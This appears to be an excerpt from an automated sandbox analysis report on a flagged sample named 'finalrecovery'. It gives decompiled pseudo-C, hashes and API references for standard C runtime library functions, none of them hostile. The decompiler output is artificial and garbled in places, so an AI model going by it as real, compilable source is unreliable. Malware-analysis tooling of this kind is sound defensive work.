std::_Lockit::~_Lockit.LIBCPMT ref: 0040CAE6
std::_Facet_Register.LIBCPMT ref: 0040CB81
std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB99

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 879449144054a13442f9bb61240584c14f95569cd9bf4c6c5eb93ccd15f26faf
Instruction ID: f29963b9afd3843b8ef27958b7b5b45cd9b3919d59b2b5220a1f5a231eb5c462
Opcode Fuzzy Hash: 879449144054a13442f9bb61240584c14f95569cd9bf4c6c5eb93ccd15f26faf
Instruction Fuzzy Hash: 72419E71A00215CBCB25DF55E882B6AB7B4EF04714F20467EE8067B392DB79BD05CB89

Uniqueness

Uniqueness Score: -1.00%

Function 1000292C Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E1000292C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x10015758);
				E10003100(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E10002A37( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t45 = E10002722(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_push(_t42);
						_push( *((intOrPtr*)(_t47 + 8)));
						_t26 = E10001000();
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_push(_t26);
								_push( *((intOrPtr*)(_t47 + 8)));
								_t29 = E10001000();
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E1000287C(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E10002A37( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E10002722(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E10002A37( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x10017968 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x1000292c
0x1000292c
0x1000292e
0x10002933
0x10002938
0x1000293d
0x1000294e
0x1000294e
0x10002952
0x10002955
0x10002961
0x10002961
0x1000296e
0x10002970
0x10002973
0x10002975
0x10002a1e
0x10002a1e
0x10002a25
0x10002a27
0x10002a2a
0x10002a36
0x10002a36
0x10002985
0x10002987
0x1000298a
0x1000298c
0x00000000
0x00000000
0x10002992
0x10002992
0x10002993
0x10002994
0x10002997
0x1000299c
0x1000299e
0x100029a1
0x100029a4
0x100029a6
0x100029a8
0x100029aa
0x100029ab
0x100029ac
0x100029af
0x100029b4
0x100029b6
0x100029b6
0x100029bc
0x100029bd
0x100029c2
0x100029c8
0x100029c8
0x100029a8
0x100029cd
0x100029cf
0x100029d6
0x100029e0
0x100029e2
0x100029e5
0x100029e7
0x100029f3
0x10002a1b
0x10002a1b
0x00000000
0x100029d1
0x100029d1
0x100029d4
0x00000000
0x00000000
0x00000000
0x100029d4
0x100029cf
0x10002957
0x1000295a
0x00000000
0x00000000
0x1000295c
0x00000000
0x1000295c
0x1000293f
0x10002945
0x00000000
0x00000000
0x10002947
0x00000000

APIs

dllmain_raw.LIBCMT ref: 10002969
dllmain_crt_dispatch.LIBCMT ref: 10002980
dllmain_raw.LIBCMT ref: 100029C8
dllmain_crt_dispatch.LIBCMT ref: 100029DB
dllmain_raw.LIBCMT ref: 100029EE

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 03221fe60647375a6c7765c943799b8376bd44600348218b49818733f6590165
Instruction ID: 0d418d2348ab436212dd1c6fb148f85ee2973b0e757816593bc875e0ad594ce7
Opcode Fuzzy Hash: 03221fe60647375a6c7765c943799b8376bd44600348218b49818733f6590165
Instruction Fuzzy Hash: 8E219276E00259ABFB32CF14CD41EAF7AA9EB85AE0F114115FC446B219D7309D51DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00425A66 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00425A66(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x43d160; // 0x43d1b4
					if(_t23 != 0) {
						E0041E238(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x43d164; // 0x450784
					if(_t24 != 0) {
						E0041E238(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x43d168; // 0x450784
					if(_t25 != 0) {
						E0041E238(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x43d190; // 0x43d1b8
					if(_t26 != 0) {
						E0041E238(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x43d194; // 0x450788
					if(_t27 != 0) {
						return E0041E238(_t6);
					}
				}
				return _t6;
			}

0x00425a6c
0x00425a71
0x00425a75
0x00425a7b
0x00425a7e
0x00425a83
0x00425a87
0x00425a8d
0x00425a90
0x00425a95
0x00425a99
0x00425a9f
0x00425aa2
0x00425aa7
0x00425aab
0x00425ab1
0x00425ab4
0x00425ab9
0x00425aba
0x00425abd
0x00425ac3
0x00000000
0x00425acb
0x00425ac3
0x00425ace

APIs

_free.LIBCMT ref: 00425A7E

Part of subcall function 0041E238: HeapFree.KERNEL32(00000000,00000000,?,00425D07,?,00000000,?,?,?,00425FAA,?,00000007,?,?,0042649D,?), ref: 0041E24E
Part of subcall function 0041E238: GetLastError.KERNEL32(?,?,00425D07,?,00000000,?,?,?,00425FAA,?,00000007,?,?,0042649D,?,?), ref: 0041E260

_free.LIBCMT ref: 00425A90
_free.LIBCMT ref: 00425AA2
_free.LIBCMT ref: 00425AB4
_free.LIBCMT ref: 00425AC6

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ecef4e8d75fb8ce96c2f369775812b1e7556ebdaa90a8c02d54b4a4fccf6128e
Instruction ID: 44bb4c4bdd525e15b518cfe20609980acefab96804d862c2bbb50dea8d0903d7
Opcode Fuzzy Hash: ecef4e8d75fb8ce96c2f369775812b1e7556ebdaa90a8c02d54b4a4fccf6128e
Instruction Fuzzy Hash: D0F09C32A046146BD624DB56F9C3C4B73EDAE043143D4190BF808DB650C778FCC04A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00442FB3 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00442FCB
_free.LIBCMT ref: 00442FDD
_free.LIBCMT ref: 00442FEF
_free.LIBCMT ref: 00443001
_free.LIBCMT ref: 00443013

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2aad3e5fa485adf972197abe42444ca206f18bad3fecad4d3bdf7461043ea1be
Instruction ID: b796e144102367d81c75d730982b4c61d5d1dbfd69c6644539770f527747fe0f
Opcode Fuzzy Hash: 2aad3e5fa485adf972197abe42444ca206f18bad3fecad4d3bdf7461043ea1be
Instruction Fuzzy Hash: 39F09632404200B7EA60DF76F985C5773F9AA04B14B94880BF044D7A64CB78FCC0965C

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4AE Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000C4AE(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x100176f8; // 0x10017748
					if(_t23 != 0) {
						E100079CC(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x100176fc; // 0x10018364
					if(_t24 != 0) {
						E100079CC(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x10017700; // 0x10018364
					if(_t25 != 0) {
						E100079CC(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x10017728; // 0x1001774c
					if(_t26 != 0) {
						E100079CC(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x1001772c; // 0x10018368
					if(_t27 != 0) {
						return E100079CC(_t6);
					}
				}
				return _t6;
			}

0x1000c4b4
0x1000c4b9
0x1000c4bd
0x1000c4c3
0x1000c4c6
0x1000c4cb
0x1000c4cf
0x1000c4d5
0x1000c4d8
0x1000c4dd
0x1000c4e1
0x1000c4e7
0x1000c4ea
0x1000c4ef
0x1000c4f3
0x1000c4f9
0x1000c4fc
0x1000c501
0x1000c502
0x1000c505
0x1000c50b
0x00000000
0x1000c513
0x1000c50b
0x1000c516

APIs

_free.LIBCMT ref: 1000C4C6

Part of subcall function 100079CC: RtlFreeHeap.NTDLL(00000000,00000000,?,10006680), ref: 100079E2
Part of subcall function 100079CC: GetLastError.KERNEL32(?,?,10006680), ref: 100079F4

_free.LIBCMT ref: 1000C4D8
_free.LIBCMT ref: 1000C4EA
_free.LIBCMT ref: 1000C4FC
_free.LIBCMT ref: 1000C50E

Memory Dump Source

Source File: 00000002.00000002.324049743.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.324045427.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324060416.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.324067694.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_finalrecovery.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 256a36538cce82c445d140af70b82f0f9be27484caf1796c286aee4a899c024a
Instruction ID: 8e7e07157a8662766dd415979a0dc6bd2e4eecdcbb719107fdd573e2c6ec1b9e
Opcode Fuzzy Hash: 256a36538cce82c445d140af70b82f0f9be27484caf1796c286aee4a899c024a
Instruction Fuzzy Hash: 94F049358047159BEA41DB68ECC6C1B37E9FB013E47A09809F40CD756ACB34FC808A60

Uniqueness

Uniqueness Score: -1.00%

Function 004416CB Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00441865

Strings

*?, xrefs: 0044170E

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: bf4b069963676f7d0cb02ad3cdfcf5dcc6c84f2a8695ebd6f3d61cbbb76b9749
Instruction ID: 94cf888e9de60d1963efd33ec482e46fa66187b9afba07f34032ac2584db377d
Opcode Fuzzy Hash: bf4b069963676f7d0cb02ad3cdfcf5dcc6c84f2a8695ebd6f3d61cbbb76b9749
Instruction Fuzzy Hash: 1F613075E002199FEF14DFA9C8815EEFBF5EF48314B24816AE815F7310E6359E818B94

Uniqueness

Uniqueness Score: -1.00%

Function 10007C4A Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007C4A(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E10006272(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E1000A361(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E10005809();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E10007A37(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E1000A361(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E10008234(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E100079CC(_t300);
														_t302 = _v12;
													}
													E100079CC(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E1000A361(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E10005809();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x10017004; // 0xb1cc4d85
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E1000ADA0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E10007C2D(_t244 - _t287 + 1, _t287,  &_v676, E10008141(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E10007B5E( &(_v608.cFileName),  &_v640,  &_v609, E10008141(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E100079CC(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E100079CC(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E1000A870(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E10007A94);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E100079CC(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E100026A5(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E100079CC(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E1000AD60(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E100079CC( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E100079CC(_t283);
						goto L31;
					}
				} else {
					_t219 = E100058B6(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E100057DC();
					L31:
					return _t297;
				}
				L81:
			}

0x10007c4f
0x10007c52
0x10007c55
0x10007c56
0x10007c58
0x10007c6e
0x10007c72
0x10007c75
0x10007c77
0x10007c79
0x10007c7b
0x10007c7d
0x10007c80
0x10007c83
0x10007c86
0x10007c88
0x10007ceb
0x10007ced
0x10007cf0
0x10007cf2
0x10007cf6
0x10007cff
0x10007d00
0x10007d03
0x10007d05
0x10007d08
0x10007d0c
0x10007d0c
0x10007d0e
0x10007d10
0x10007d12
0x10007d14
0x10007d14
0x10007d16
0x10007d19
0x10007d1c
0x10007d1c
0x10007d1e
0x10007d1f
0x10007d1f
0x10007d2a
0x10007d2c
0x10007d2f
0x10007d30
0x10007d33
0x10007d33
0x10007d37
0x10007d3a
0x10007d3d
0x10007d3d
0x10007d3d
0x10007d4a
0x10007d4c
0x10007d4f
0x10007d51
0x10007d69
0x10007d6c
0x10007d6f
0x10007d71
0x10007d74
0x10007d76
0x10007d79
0x10007d7c
0x10007dd9
0x10007ddc
0x10007ddf
0x10007de1
0x00000000
0x10007d7e
0x10007d80
0x10007d80
0x10007d82
0x10007d85
0x10007d85
0x10007d87
0x10007d89
0x10007d8f
0x10007d92
0x10007d92
0x10007d94
0x10007d95
0x10007d95
0x10007d9c
0x10007d9f
0x10007da3
0x10007db0
0x10007db5
0x10007db8
0x10007dba
0x10007e2e
0x10007e2f
0x10007e30
0x10007e31
0x10007e32
0x10007e33
0x10007e38
0x10007e3c
0x10007e3e
0x10007e3f
0x10007e42
0x10007e42
0x10007e45
0x10007e45
0x10007e47
0x10007e48
0x10007e48
0x10007e4c
0x10007e4d
0x10007e54
0x10007e57
0x10007e5a
0x10007e5c
0x10007e64
0x10007e65
0x10007e66
0x10007e69
0x10007e73
0x10007e77
0x10007e79
0x10007e8d
0x10007e8d
0x10007e90
0x10007e9a
0x10007e9f
0x10007ea2
0x10007ea4
0x00000000
0x10007ea6
0x10007ea6
0x10007eab
0x10007eb2
0x10007eb5
0x10007eb7
0x10007ec8
0x10007eca
